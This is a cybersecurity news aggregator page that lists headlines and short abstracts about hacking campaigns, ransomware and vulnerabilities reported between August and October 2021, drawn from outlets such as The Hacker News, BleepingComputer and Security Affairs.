Nobelium, the threat actor behind the SolarWinds compromise in December 2020, has been behind a new wave of attacks that compromised 14 downstream customers of multiple cloud service providers (CSP), managed service providers (MSP), and other IT services organizations, illustrating the adversary's continuing interest in targeting the supply chain via the "compromise-one-to-compromise-many" approach. Microsoft, which disclosed details of the campaign on Monday, said it notified more than 140 resellers and technology service providers since May. Between July 1 and October 19, 2021, Nobelium is said to have singled out 609 customers, who were collectively attacked a grand total of 22,868 times. "This recent activity is another indicator that Russia is trying to gain long-term, systematic access to a variety of points in the technology supply chain and establish a mechanism for surveilling – now or in the future – targets of interest to the Russian government,"The Hacker News
October 25, 2021
Hackers used billing software zero-day to deploy ransomware Full Text
Abstract
An unknown ransomware group is exploiting a critical SQL injection bug found in the BillQuick Web Suite time and billing solution to deploy ransomware on their targets' networks in ongoing attacks.BleepingComputer
October 25, 2021
Hackers Exploited Popular BillQuick Billing Software to Deploy Ransomware Full Text
Abstract
Cybersecurity researchers on Friday disclosed a now-patched critical vulnerability in multiple versions of a time and billing system called BillQuick that's being actively exploited by threat actors to deploy ransomware on vulnerable systems. CVE-2021-42258 , as the flaw is being tracked as, concerns an SQL-based injection attack that allows for remote code execution and was successfully leveraged to gain initial access to an unnamed U.S. engineering company and mount a ransomware attack, American cybersecurity firm Huntress Labs said. While the issue has been addressed by BQE Software, eight other undisclosed security issues that were identified as part of the investigation are yet to be patched. According to its website , BQE Software's products are used by 400,000 users worldwide. "Hackers can use this to access customers' BillQuick data and run malicious commands on their on-premises Windows servers," Huntress Labs threat researcher Caleb Stewart saThe Hacker News
October 22, 2021
Hackers Set Up Fake Company to Get IT Experts to Launch Ransomware Attacks Full Text
Abstract
The financially motivated FIN7 cybercrime gang has masqueraded as yet another fictitious cybersecurity company called "Bastion Secure" to recruit unwitting software engineers under the guise of penetration testing in a likely lead-up to a ransomware scheme. "With FIN7's latest fake company, the criminal group leveraged true, publicly available information from various legitimate cybersecurity companies to create a thin veil of legitimacy around Bastion Secure," Recorded Future's Gemini Advisory unit said in a report. "FIN7 is adopting disinformation tactics so that if a potential hire or interested party were to fact check Bastion Secure, then a cursory search on Google would return 'true' information for companies with a similar name or industry to FIN7's Bastion Secure." FIN7 , also known as Carbanak, Carbon Spider, and Anunak, has a track record of striking restaurant, gambling, and hospitality industries in the U.S. to infectThe Hacker News
October 21, 2021
Hacking group tied to Colonial Pipeline attack continuing to recruit tech talent Full Text
Abstract
A hacking group linked to the ransomware attack on Colonial Pipeline earlier this year is posing as a fake company to recruit individuals to help carry out further attacks, according to a report published Thursday.The Hill
October 21, 2021
Hackers Stealing Browser Cookies to Hijack High-Profile YouTube Accounts Full Text
Abstract
Since at least late 2019, a network of hackers-for-hire have been hijacking the channels of YouTube creators, luring them with bogus collaboration opportunities to broadcast cryptocurrency scams or sell the accounts to the highest bidder. That's according to a new report published by Google's Threat Analysis Group (TAG), which said it disrupted financially motivated phishing campaigns targeting the video platform with cookie theft malware. The actors behind the infiltration have been attributed to a group of hackers recruited in a Russian-speaking forum. "Cookie Theft, also known as 'pass-the-cookie attack,' is a session hijacking technique that enables access to user accounts with session cookies stored in the browser," TAG's Ashley Shen said . "While the technique has been around for decades, its resurgence as a top security risk could be due to a wider adoption of multi-factor authentication (MFA) making it difficult to conduct abuse, and shifThe Hacker News
October 20, 2021
Google Crushes YouTube Cookie-Stealing Channel Hijackers Full Text
Abstract
Google has caught and brushed off a bunch of cookie-stealing YouTube channel hijackers who were running cryptocurrency scams on, or auctioning off, ripped-off channels.Threatpost
October 20, 2021
Researchers Break Intel SGX With New ‘SmashEx’ CPU Attack Technique Full Text
Abstract
A newly disclosed vulnerability affecting Intel processors could be abused by an adversary to gain access to sensitive information stored within enclaves and even run arbitrary code on vulnerable systems. The vulnerability ( CVE-2021-0186 , CVSS score: 8.2) was discovered by a group of academics from ETH Zurich, the National University of Singapore, and the Chinese National University of Defense Technology in early May 2021, who used it to stage a confidential data disclosure attack called " SmashEx " that can corrupt private data housed in the enclave and break its integrity. Introduced with Intel's Skylake processors, SGX (short for Software Guard eXtensions) allows developers to run selected application modules in a completely isolated secure compartment of memory, called an enclave or a Trusted Execution Environment (TEE), which is designed to be protected from processes running at higher privilege levels like the operating system. SGX ensures that data is secureThe Hacker News
October 20, 2021
Major Russian hacking group linked to ransomware attack on Sinclair: report Full Text
Abstract
A well-known Russian hacking group previously sanctioned by the United States is behind the crippling ransomware attack on Sinclair Broadcast Group that is continuing to impact news stations across the country, according to a new report.The Hill
October 20, 2021
China-linked LightBasin group accessed calling records from telcos worldwide Full Text
Abstract
China-linked cyberespionage group LightBasin hacked mobile telephone networks around the world and used specialized tools to access calling records. A China-linked hacking group, tracked as LightBasin (aka UNC1945), hacked mobile telephone networks...Security Affairs
October 20, 2021
Hackers are Disguising Malicious JavaScript Code Using Packers to Bypass Signature-based Detection Systems Full Text
Abstract
Packers work by compressing or encrypting code to make that code unreadable and non-debuggable — resulting in 'obfuscated' code that is difficult for antivirus to detect.ZDNet
October 19, 2021
Potential Chinese hackers targeting telecommunications companies Full Text
Abstract
Hackers potentially linked to China are continuously targeting the telecommunications sector, a report released Tuesday by cybersecurity company CrowdStrike found.The Hill
October 19, 2021
Symantec uncovered a previously unknown nation-state actor, named Harvester, that targeted telcos Full Text
Abstract
Symantec spotted a previously unknown nation-state actor, tracked as Harvester, that is targeting telecommunication providers and IT firms in South Asia. Symantec spotted a previously unknown nation-state actor, tracked as Harvester, that is using...Security Affairs
October 18, 2021
Cybersecurity Experts Warn of a Rise in Lyceum Hacker Group Activities in Tunisia Full Text
Abstract
A threat actor, previously known for striking organizations in the energy and telecommunications sectors across the Middle East as early as April 2018, has evolved its malware arsenal to strike two entities in Tunisia. Security researchers at Kaspersky, who presented their findings at the VirusBulletin VB2021 conference earlier this month, attributed the attacks to a group tracked as Lyceum (aka Hexane), which was first publicly documented in 2019 by Secureworks. "The victims we observed were all high-profile Tunisian organizations, such as telecommunications or aviation companies," researchers Aseel Kayal, Mark Lechtik, and Paul Rascagneres detailed . "Based on the targeted industries, we assume that the attackers might have been interested in compromising such entities to track the movements and communications of individuals of interest to them." Analysis of the threat actor's toolset has shown that the attacks have shifted from leveraging a combinatThe Hacker News
October 18, 2021
How Attackers Used Math Symbols to Evade Detection Full Text
Abstract
Experts reported a phishing attempt targeted at Verizon that involves the use of mathematical symbols to bypass anti-phishing systems to acquire users’ Office 365 credentials. The spoofed messages pretend to be a voicemail notification with an embedded Play button. The recent campaign reflects how ... Read MoreCyware Alerts - Hacker News
October 18, 2021
TeamTNT Deploys Malicious Docker Image On Docker Hub Full Text
Abstract
The Uptycs Threat Research Team spotted a campaign in which the TeamTNT threat actors deployed a malicious container image on Docker hub. The Uptycs Threat Research Team recently identified a campaign in which the TeamTNT threat actors deployed a malicious...Security Affairs
October 18, 2021
Chinese Actors Use MysterySnail RAT to Exploit Windows Zero-day Full Text
Abstract
Kaspersky unearthed a cyberespionage campaign exploiting a zero-day flaw in Windows to deliver MysterySnail malware and steal data. A connection to a Chinese-speaking APT was also established. Experts recommend organizations stay proactive and ready with adequate security measures.Cyware Alerts - Hacker News
October 18, 2021
U.S. and Israeli Defense Tech Firms Targeted by Iranian Actors Full Text
Abstract
Iran-linked hackers were found conducting extensive password spraying attacks against Office 365 accounts of defense technology and global maritime firms in the U.S. and Israel. The group attempts to gain access to commercial satellite imagery and proprietary shipping plans/logs. Microsoft notifie ... Read MoreCyware Alerts - Hacker News
October 17, 2021
Experts hacked a fully patched iOS 15 running on iPhone 13 at China’s Tianfu Cup hacking contest Full Text
Abstract
White hat hackers earned $1.88 million at the Tianfu Cup hacking contest by finding vulnerabilities in popular software. The Tianfu Cup is the most important hacking contest held in China, this year white hat hackers earned $1.88 Million demonstrating...Security Affairs
October 16, 2021
Researchers Disclose New Side-Channel Attacks Affecting All AMD CPUs Full Text
Abstract
Researchers have disclosed the details of new timing and power-based side-channel attacks that affect all CPUs made by AMD, but the chipmaker says no new mitigations are necessary.Security Week
October 14, 2021
Google: We’re Tracking 270 State-Sponsored Hacker Groups From Over 50 Countries Full Text
Abstract
Google's Threat Analysis Group (TAG) on Thursday said it's tracking more than 270 government-backed threat actors from more than 50 countries, adding it has approximately sent 50,000 alerts of state-sponsored phishing or malware attempts to customers since the start of 2021. The warnings mark a 33% increase from 2020, the internet giant said, with the spike largely stemming from "blocking an unusually large campaign from a Russian actor known as APT28 or Fancy Bear." Additionally, Google said it disrupted a number of campaigns mounted by an Iranian state-sponsored attacker group tracked as APT35 (aka Charming Kitten, Phosphorous, or Newscaster), including a sophisticated social engineering attack dubbed "Operation SpoofedScholars" aimed at think tanks, journalists, and professors with an aim to solicit sensitive information by masquerading as scholars with the University of London's School of Oriental and African Studies (SOAS). Details of thThe Hacker News
October 12, 2021
Chinese hackers use Windows zero-day to attack defense, IT firms Full Text
Abstract
A Chinese-speaking hacking group exploited a zero-day vulnerability in the Windows Win32k kernel driver to deploy a previously unknown remote access trojan (RAT).BleepingComputer
October 12, 2021
SnapMC hackers skip file encryption and just steal your files Full Text
Abstract
A new actor tracked as SnapMC has emerged in the cybercrime space, performing the typical data-stealing extortion that underpins ransomware operations, but without doing any file encryption.BleepingComputer
October 11, 2021
Microsoft Warns of Iran-Linked Hackers Targeting US and Israeli Defense Firms Full Text
Abstract
An emerging threat actor likely supporting Iranian national interests has been behind a password spraying campaign targeting US, EU, and Israeli defense technology companies, with additional activity observed against regional ports of entry in the Persian Gulf as well as maritime and cargo transportation companies focused in the Middle East. Microsoft is tracking the hacking crew under the moniker DEV-0343 . The intrusions, which were first observed in late July 2021, are believed to have targeted more than 250 Office 365 tenants, fewer than 20 of which were successfully compromised following a password spray attack — a type of brute force attack wherein the same password is cycled against different usernames to log into an application or a network in an effort to avoid account lockouts. Indications thus far allude to the possibility that the activity is part of an intellectual property theft campaign aimed at government partners producing military-grade radars, drone technologyThe Hacker News
October 11, 2021
Microsoft reports Iranian hackers targeting US, Israeli defense companies Full Text
Abstract
Microsoft on Monday released evidence showing Iranian-linked hackers targeting and at times compromising systems of U.S. and Israeli defense technology companies.The Hill
October 11, 2021
Microsoft: Iran-linked hackers target US defense tech companies Full Text
Abstract
Iran-linked threat actors are targeting the Office 365 tenants of US and Israeli defense technology companies in extensive password spraying attacks.BleepingComputer
October 11, 2021
Microsoft: Iran-linked hackers target US defense tech companies Full Text
Abstract
Iran-linked threat actors are targeting the Office 365 tenants of US and Israeli defense technology companies in extensive password spraying attacks.BleepingComputer
October 8, 2021
Atom Silo Group Eyeing Confluence Servers Full Text
Abstract
SophosLabs researchers uncovered Atom Silo, a new ransomware group almost identical to LockFile, actively exploiting Atlassian Confluence Server and Data Center flaw. The group is using several novel techniques that make it very challenging to examine, including DLL side-loading to interrupt endpo ... Read MoreCyware Alerts - Hacker News
October 8, 2021
Update: Hackers of SolarWinds stole data on U.S. sanctions policy, intelligence probes Full Text
Abstract
The campaign alarmed officials with its stealth and careful staging. The hackers burrowed into the code production process at SolarWinds, which makes widely used software for managing networks.Reuters
October 07, 2021
Microsoft report finds Russia dominant force behind cyberattacks in past year Full Text
Abstract
Cyberattacks originating in Russia accounted for more than half of intrusions tracked by Microsoft since mid-2020, the company said in a report released Thursday.The Hill
October 06, 2021
Iranian Hackers Abuse Dropbox in Cyberattacks Against Aerospace and Telecom Firms Full Text
Abstract
Details have emerged about a new cyber espionage campaign directed against the aerospace and telecommunications industries, primarily in the Middle East, with the goal of stealing sensitive information about critical assets, organizations' infrastructure, and technology while remaining in the dark and successfully evading security solutions. Boston-based cybersecurity company Cybereason dubbed the attacks " Operation Ghostshell ," pointing out the use of a previously undocumented and stealthy remote access trojan (RAT) called ShellClient that's deployed as the main spy tool of choice. The first sign of the attacks was observed in July 2021 against a handpicked set of victims, indicating a highly targeted approach. "The ShellClient RAT has been under ongoing development since at least 2018, with several iterations that introduced new functionalities, while it evaded antivirus tools and managed to remain undetected and publicly unknown," researchers Tom FakThe Hacker News
October 6, 2021
Exclusive: Researchers dumped Gigabytes of data from Agent Tesla C2Cs Full Text
Abstract
Resecurity researchers dumped Gigabytes of data from Agent Tesla C2Cs, one of the most well-known cyberespionage tools suffers a data leakage. Agent Tesla, first discovered in late 2014, is an extremely popular "malware-as-a-service" Remote Access...Security Affairs
October 06, 2021
Hackers use stealthy ShellClient malware on aerospace, telco firms Full Text
Abstract
Threat researchers investigating malware used to target companies in the aerospace and telecommunications sectors discovered a new threat actor that has been running cyber espionage campaigns since at least 2018.BleepingComputer
October 05, 2021
New Study Links Seemingly Disparate Malware Attacks to Chinese Hackers Full Text
Abstract
Chinese cyber espionage group APT41 has been linked to seemingly disparate malware campaigns, according to fresh research that has mapped together additional parts of the group's network infrastructure to hit upon a state-sponsored campaign that takes advantage of COVID-themed phishing lures to target victims in India. "The image we uncovered was that of a state-sponsored campaign that plays on people's hopes for a swift end to the pandemic as a lure to entrap its victims," the BlackBerry Research and Intelligence team said in a report shared with The Hacker News. "And once on a user's machine, the threat blends into the digital woodwork by using its own customized profile to hide its network traffic." APT41 (aka Barium or Winnti) is a moniker assigned to a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in conjunction with financially motivated operations for personal gain as far back as 2012. Calling the groThe Hacker News
October 5, 2021
Dark web marketplace White House announces end to its operations Full Text
Abstract
The dark web marketplace White House Market shuts down its operation, last week its operators announced that they were retiring. The dark web marketplace White House Market shuts down its operation, the announcement was published on a dread forum....Security Affairs
October 04, 2021
RaidForums forced to use mirror after Brazilian govt contacts registrar Full Text
Abstract
The RaidForums hacking forum has gone through a turbulent week, with its website now forced through a mirror domain after a government filed a legal request with their registrar.BleepingComputer
October 01, 2021
Chinese Hackers Used a New Rootkit to Spy on Targeted Windows 10 Users Full Text
Abstract
A formerly unknown Chinese-speaking threat actor has been linked to a long-standing evasive operation aimed at South East Asian targets as far back as July 2020 to deploy a kernel-mode rootkit on compromised Windows systems. Attacks mounted by the hacking group, dubbed GhostEmperor by Kaspersky, are also said to have used a "sophisticated multi-stage malware framework" that allows for providing persistence and remote control over the targeted hosts. The Russian cybersecurity firm called the rootkit Demodex , with infections reported across several high-profile entities in Malaysia, Thailand, Vietnam, and Indonesia, in addition to outliers located in Egypt, Ethiopia, and Afghanistan. "[Demodex] is used to hide the user mode malware's artefacts from investigators and security solutions, while demonstrating an interesting undocumented loading scheme involving the kernel mode component of an open-source project named Cheat Engine to bypass the Windows Driver SigThe Hacker News
September 30, 2021
Experts show how to make fraudulent payments using Apple Pay with VISA on locked iPhones Full Text
Abstract
Security researchers devised a new attack method against iPhone owners using Apple Pay and Visa payment cards. Boffins from the University of Birmingham and the University of Surrey exploited a series of vulnerabilities in an attack against iPhone...Security Affairs
September 30, 2021
Innovative Proxy Phantom ATO Fraud Ring Haunts eCommerce Accounts Full Text
Abstract
The group uses millions of password combos at the rate of nearly 2,700 login attempts per minute with new techniques that push the ATO envelope.Threatpost
September 30, 2021
GhostEmperor hackers use new Windows 10 rootkit in attacks Full Text
Abstract
Chinese-speaking cyberspies have targeted Southeast Asian governmental entities and telecommunication companies for more than a year, backdooring systems running the latest Windows 10 versions with a newly discovered rootkit.BleepingComputer
September 30, 2021
New Tomiris Backdoor Found Linked to Hackers Behind SolarWinds Cyberattack Full Text
Abstract
Cybersecurity researchers on Wednesday disclosed a previously undocumented backdoor likely designed and developed by the Nobelium advanced persistent threat (APT) behind last year's SolarWinds supply chain attack , joining the threat actor's ever-expanding arsenal of hacking tools. Moscow-headquartered firm Kaspersky codenamed the malware " Tomiris ," calling out its similarities to another second-stage malware used during the campaign, SUNSHUTTLE (aka GoldMax), targeting the IT management software provider's Orion platform. Nobelium is also known by the monikers UNC2452, SolarStorm, StellarParticle, Dark Halo, and Iron Ritual. "While supply-chain attacks were already a documented attack vector leveraged by a number of APT actors, this specific campaign stood out due to the extreme carefulness of the attackers and the high-profile nature of their victims," Kaspersky researchers said . "Evidence gathered so far indicates that Dark Halo spent siThe Hacker News
September 29, 2021
Hackers Targeting Brazil’s PIX Payment System to Drain Users’ Bank Accounts Full Text
Abstract
Two newly discovered malicious Android applications on Google Play Store have been used to target users of Brazil's instant payment ecosystem in a likely attempt to lure victims into fraudulently transferring their entire account balances into another bank account under cybercriminals' control. "The attackers distributed two different variants of banking malware, named PixStealer and MalRhino , through two separate malicious applications […] to carry out their attacks," Check Point Research said in an analysis shared with The Hacker News. "Both malicious applications were designed to steal money of victims through user interaction and the original PIX application." The two apps in question, which were uncovered in April 2021, have since been removed from the app store. Launched in November 2020 by the Central Bank of Brazil, the country's monetary authority, Pix is a state-owned payments platform that enables consumers and companies to make moneThe Hacker News
September 29, 2021
New Tomiris backdoor likely developed by SolarWinds hackers Full Text
Abstract
Kaspersky security researchers have discovered a new backdoor likely developed by the Nobelium hacking group behind last year's SolarWinds supply chain attack.BleepingComputer
September 29, 2021
TA544 Threat Group Targets Over 2,000 Italian Organizations with Ursnif Malware Full Text
Abstract
Proofpoint has observed nearly 20 notable campaigns distributing thousands of messages targeting Italian organizations this year, which equals 80% of the number of similar campaigns in 2020.Proofpoint
September 28, 2021
Researchers uncover new techniques used to spread FinSpy Full Text
Abstract
Apart from the Trojanized installers, Kaspersky observed infections involving usage of a UEFI or MBR bootkit. While the MBR infection is well known, details on the UEFI bootkit are newly revealed.Kaspersky Labs
September 28, 2021
Suspected Chinese State-linked Threat Actors Infiltrated Major Afghan Telecom Provider Roshan Full Text
Abstract
Four distinct infiltrations by suspected Chinese-state-sponsored threat actors stole gigabytes of data from the corporate mail server of major Afghan telecom provider Roshan within the past year.The Record
September 27, 2021
Microsoft: Nobelium uses custom malware to backdoor Windows domains Full Text
Abstract
Microsoft has discovered new malware used by the Nobelium hacking group to deploy additional payloads and steal sensitive info from Active Directory Federation Services (AD FS) servers.BleepingComputer
September 27, 2021
Attackers Use Fake Installers to Drop Malware and Open Doors for Cryptomining and Credential Theft Full Text
Abstract
Fake installers of popular software are being used to deliver malware onto victims’ devices. These lures trick users into opening malicious documents or installing unwanted applications.Trend Micro
September 26, 2021
Google TAG spotted actors using new code signing tricks to evade detection Full Text
Abstract
Researchers from Google’s TAG team reported that financially motivated actors are using new code signing tricks to evade detection. Researchers from Google’s Threat Analysis Group reported that financially motivated actors are using new code signing...Security Affairs
September 24, 2021
Hackers exploiting critical VMware vCenter CVE-2021-22005 bug Full Text
Abstract
Exploit code that could be used for remote code execution on VMware vCenter Server vulnerable to CVE-2021-22005 has been released today and attackers are already using it.BleepingComputer
September 24, 2021
Google Warns of a New Way Hackers Can Make Malware Undetectable on Windows Full Text
Abstract
Cybersecurity researchers have disclosed a novel technique adopted by threat actors to deliberately evade detection with the help of malformed digital signatures of its malware payloads. "Attackers created malformed code signatures that are treated as valid by Windows but are not able to be decoded or checked by OpenSSL code — which is used in a number of security scanning products," Google Threat Analysis Group's Neel Mehta said in a write-up published on Thursday. The new mechanism was observed to be exploited by a notorious family of unwanted software known as OpenSUpdater that's used to download and install other suspicious programs on compromised systems. Most targets of the campaign are users located in the U.S. who are prone to downloading cracked versions of games and other grey-area software. The findings come from a set of OpenSUpdater samples uploaded to VirusTotal at least since mid-August. Not only are the artifacts signed with an invalid lThe Hacker News
September 22, 2021
Operation Layover by Nigerian Threat Actor Targets Aviation Sector Full Text
Abstract
Cisco Talos uncovered a three-year-long espionage campaign, dubbed Operation Layover, aimed at the airline industry. Cybercriminals are spreading AsyncRAT and njRAT via malicious documents. In the ongoing campaign, attackers can change their crypter/attack vector and continue stealing from victims ... Read MoreCyware Alerts - Hacker News
September 21, 2021
Russian state hackers use new TinyTurla malware as secondary backdoor Full Text
Abstract
Russian state-sponsored hackers known as the Turla APT group have been using new malware over the past year that acted as a secondary persistence method on compromised systems in the U.S., Germany, and Afghanistan.BleepingComputer
September 20, 2021
A hacker may have personal information of thousands of NEISD employees Full Text
Abstract
Over 5,000 current and former NEISD employees received a letter from the district saying their payroll information, including names and social security numbers, was at risk of being compromised.MySanAntonio
September 18, 2021
Threat actor has been targeting the aviation industry since at least 2018 Full Text
Abstract
Security researchers from the Cisco Talos team uncovered a spear-phishing campaign targeting the aviation industry for two years avoiding detection. Security researchers from Cisco Talos uncovered a spear-phishing campaign targeting, dubbed Operation...Security Affairs
September 17, 2021
Hackers pose as bank customers by stealing OTPs, making $500k in fake credit card payments Full Text
Abstract
Hackers abroad have been able to pose as 75 bank customers here to make about $500,000 in fake credit card payments. This was done by a sophisticated method of hijacking the OTPs by banks.Straits Times
September 13, 2021
Hackers Target Golden SAML Tokens for Network Access Full Text
Abstract
An APT group spotted targeting the Active Directory server of a victim’s Office365 environment by gaining access to the secret SAML tokens, which generally pass information about users, logins, and attributes between the identity and service providers. Experts suggest implementing additional ... Read MoreCyware Alerts - Hacker News
September 13, 2021
Hackers Steal Puma Source Code for an Internal Application Full Text
Abstract
Hackers have stolen information from sportswear maker Puma and are currently trying to extort the company into paying a ransom demand, threatening to release the stolen files on a dark web portal.The Record
September 13, 2021
North Korea’s Kumsong 121 recently employed social media to launch a cyber attack Full Text
Abstract
The North Korean hacker group Kumsong 121 recently launched a cyber attack using social media. Computer and mobile phone users should be wary as North Korean hacking attacks grow more sophisticated.dailynk
September 08, 2021
Microsoft warns of hackers exploiting Windows vulnerability Full Text
Abstract
Microsoft this week warned that hackers are actively exploiting a vulnerability in its Windows program, urging customers to take steps to shore up security.The Hill
September 8, 2021
TeamTNT Uses Chimaera Malware Bundle in Stealthy New Campaign Full Text
Abstract
AT&T's Alien Labs has sounded the alarm on a malware campaign from TeamTNT which has gone almost entirely undetected by anti-virus and which is turning target devices into cryptocurrency miners.The Register
September 4, 2021
FIN7 group leverages Windows 11 Alpha-Themed docs to drop Javascript payloads Full Text
Abstract
FIN7 cybercrime gang used weaponized Windows 11 Alpha-themed Word documents to drop malicious payloads, including a JavaScript backdoor. Anomali Threat Research experts have monitored recent spear-phishing attacks conducted by financially motivated...Security Affairs
September 4, 2021
Why Ransomware Hackers Love a Holiday Weekend Full Text
Abstract
Ransomware can take time to propagate throughout a network, as hackers work to escalate privileges for maximum control over most systems. The longer it takes for anyone to notice, the more damage they can do.Wired
September 04, 2021
Microsoft Says Chinese Hackers Were Behind SolarWinds Serv-U SSH 0-Day Attack Full Text
Abstract
Microsoft has shared technical details about a now-fixed, actively exploited critical security vulnerability affecting SolarWinds Serv-U managed file transfer service that it has attributed with "high confidence" to a threat actor operating out of China. In mid-July, the Texas-based company remedied a remote code execution flaw ( CVE-2021-35211 ) that was rooted in Serv-U's implementation of the Secure Shell (SSH) protocol, which could be abused by attackers to run arbitrary code on the infected system, including the ability to install malicious programs and view, change, or delete sensitive data. "The Serv-U SSH server is subject to a pre-auth remote code execution vulnerability that can be easily and reliably exploited in the default configuration," Microsoft Offensive Research and Security Engineering team said in a detailed write-up describing the exploit. "An attacker can exploit this vulnerability by connecting to the open SSH port and sendinThe Hacker News
September 3, 2021
Chinese hackers behind July 2021 SolarWinds zero-day attacks Full Text
Abstract
The zero-day was the work of a new threat actor tracked as DEV-0322, which Microsoft described as “a group operating out of China, based on observed victimology, tactics, and procedures.”The Record
September 03, 2021
FIN7 Hackers Using Windows 11 Themed Documents to Drop Javascript Backdoor Full Text
Abstract
A recent wave of spear-phishing campaigns leveraged weaponized Windows 11 Alpha-themed Word documents with Visual Basic macros to drop malicious payloads, including a JavaScript implant, against a point-of-sale (PoS) service provider located in the U.S. The attacks, which are believed to have taken place between late June to late July 2021, have been attributed with "moderate confidence" to a financially motivated threat actor dubbed FIN7, according to researchers from cybersecurity firm Anomali. "The specified targeting of the Clearmind domain fits well with FIN7's preferred modus operandi," Anomali Threat Research said in a technical analysis published on September 2. "The group's goal appears to have been to deliver a variation of a JavaScript backdoor used by FIN7 since at least 2018." An Eastern European group active since at least mid-2015, FIN7 has a checkered history of targeting restaurant, gambling, and hospitality industries in thThe Hacker News
September 2, 2021
Attackers are attempting to exploit recently patched Atlassian Confluence CVE-2021-26084 RCE Full Text
Abstract
Threat actors are actively exploiting a recently patched vulnerability in Atlassian’s Confluence enterprise collaboration product. Threat actors were spotted exploiting the CVE-2021-26084 vulnerability in Atlassian’s Confluence enterprise collaboration...Security Affairs
September 1, 2021
Attackers Sell Your Internet Bandwidth for Passive Income Full Text
Abstract
Cisco Talos highlighted the rise in abuse of proxyware that allows adversaries to manipulate compromised internet connections to generate illicit revenue. Attackers were also observed installing digital currency miners and info-stealers to earn additional revenue. In some cases, hackers even patch ... Read MoreCyware Alerts - Hacker News
August 31, 2021
Threat actors can remotely disable Fortress S03 Wi-Fi Home Security System Full Text
Abstract
Rapid7 researchers discovered two flaws that can be exploited by attackers to remotely disable one of the home security systems offered by Fortress Security Store. Researchers at cybersecurity firm Rapid7 discovered two vulnerabilities that can be exploited...Security Affairs
August 30, 2021
ISRAELI FIRM ‘BRIGHT DATA’ (LUMINATI NETWORKS) ENABLED THE ATTACKS AGAINST KARAPATAN Full Text
Abstract
Who is behind the massive and prolonged Distributed Denial of Service (DDoS) attack that hit the Philippine human rights alliance Karapatan? The 25 days long DDoS attack against the website of Karapatan was launched by almost 30.000 IP addresses,...Security Affairs
August 30, 2021
A new wave of Hacktivists is turning the surveillance state against itself Full Text
Abstract
Images and videos stolen from oppressive regimes’ surveillance systems are being leaked in a new surge of suspected hacktivism that uses states’ own panopticons against them.The Record
August 27, 2021
T-Mobile CEO: Hacker brute-forced his way through our network Full Text
Abstract
Today, T-Mobile's CEO Mike Sievert said that the hacker behind the carrier's latest massive data breach brute forced his way through T-Mobile's network after gaining access to testing environments.BleepingComputer
August 25, 2021
California Man Hacked iCloud Accounts to Steal Nude Photos Full Text
Abstract
Hao Kou Chi pleaded guilty to four felonies in a hacker-for-hire scam that used socially engineered emails to trick people out of their credentials.Threatpost
August 24, 2021
Hackers Could Increase Medication Doses by Exploiting Security Flaws in Infusion Pumps Full Text
Abstract
Researchers found that an attacker with access to a health care facility's network could take control of B. Braun SpaceStation by exploiting a common connectivity vulnerability.Wired
August 23, 2021
Attackers Actively Exploiting Realtek SDK Flaws Full Text
Abstract
Multiple vulnerabilities in software used by 65 vendors under active attack.Threatpost
August 23, 2021
Hacker gets 500K reward for returning stolen cryptocurrency Full Text
Abstract
The saga of what has been dubbed the biggest hack in the world of decentralized finance appears to be over as Poly Network recovered more than $610 million in cryptocurrency assets it lost two weeks ago and the hacker received a $500,000 bounty for returning the money.BleepingComputer
August 23, 2021
Poly Network claims a hacker returned stolen $600 million Full Text
Abstract
A colossal, as well as bizarre crypto heist story seems to have reached its end. Poly Network, a DeFi platform, announced the hacker that stole over $600 million in one of the largest crypto heists had returned control of the money.Cyber News
August 21, 2021
North Korean Hacker Group Uses Browser Exploits Full Text
Abstract
The security experts of the cybersecurity firm, Volexity have recently reported an attack through which the North Korean Hacker Group using browser exploits to deploy the customer malware on the website.GB Hackers
August 19, 2021
You can post LinkedIn jobs as almost ANY employer — so can attackers Full Text
Abstract
Anyone can create a job listing on the leading recruitment platform LinkedIn on behalf of any employer—no verification needed. And worse, the employer cannot easily take these down.BleepingComputer
August 19, 2021
CEO tried funding his startup by asking insiders to deploy ransomware Full Text
Abstract
Likely inspired by the LockBit ransomware gang, a Nigerian threat actor tried their luck with a $1 million payment lure to recruit an insider to detonate a ransomware payload on the company servers.BleepingComputer
August 19, 2021
You can post LinkedIn jobs as ANY employer — so can attackers Full Text
Abstract
Anyone can create a job listing on the leading recruitment platform LinkedIn on behalf of any employer—no verification needed. And worse, the employer cannot easily take these down.BleepingComputer
August 18, 2021
Iranian Hackers Target Several Israeli Organizations With Supply-Chain Attacks Full Text
Abstract
IT and communication companies in Israel were at the center of a supply chain attack campaign spearheaded by an Iranian threat actor that involved impersonating the firms and their HR personnel to target victims with fake job offers in an attempt to penetrate their computers and gain access to the company's clients. The attacks, which occurred in two waves in May and July 2021, have been linked to a hacker group called Siamesekitten (aka Lyceum or Hexane) that has primarily singled out oil, gas, and telecom providers in the Middle East and in Africa at least since 2018, researchers from ClearSky said in a report published Tuesday. Infections undertaken by the adversary commenced with identifying potential victims, who were then enticed with "alluring" job offers in well-known companies like ChipPc and Software AG by posing as human resources department employees from the impersonated firms, only to lead the victims to a phishing website containing weaponized files tThe Hacker News
August 18, 2021
T-Mobile Says Hackers Stole Personal Information on Over 40 Million Current and Prospective Customers Full Text
Abstract
The telco said that the stolen data included first and last names, birth dates, Social Security numbers, and driver’s license information from a subset of current and potential customers.Reuters
August 16, 2021
Hackers behind Iranian wiper attacks linked to Syrian breaches Full Text
Abstract
Destructive attacks that targeted Iran's transport ministry and national train system were coordinated by a threat actor dubbed Indra who previously deployed wiper malware on the networks of multiple Syrian organizations.BleepingComputer
August 16, 2021
Hacker Claims to Sell Personal Data of More Than 100 Million T-Mobile Customers Full Text
Abstract
A cybercriminal is claiming to have data related to more than 100 million T-Mobile customers in the U.S. and is selling access to part of the information for roughly $277,000.Gizmodo
August 13, 2021
UNC215 Impersonated an Iranian Group to Target Israeli Organizations Full Text
Abstract
According to Mandiant, Chinese cyberespionage group UNC215 impersonated Iranian threat actors to target Israeli organizations in a campaign that began in January 2019.Cyware Alerts - Hacker News
August 13, 2021
Bugs in gym management software let hackers wipe fitness history Full Text
Abstract
Security researchers found vulnerabilities in the Wodify fitness platform that allows an attacker to view and modify user workouts from any of the more than 5,000 gyms that use the solution worldwide.BleepingComputer
August 13, 2021
Bugs in gym management software let hackers change user workout results Full Text
Abstract
Security researchers found vulnerabilities in the Wodify fitness platform that allows an attacker to view and modify user workouts from any of the more than 5,000 gyms that use the solution worldwide.BleepingComputer
August 13, 2021
Hackers Spotted Using Morse Code in Phishing Attacks to Evade Detection Full Text
Abstract
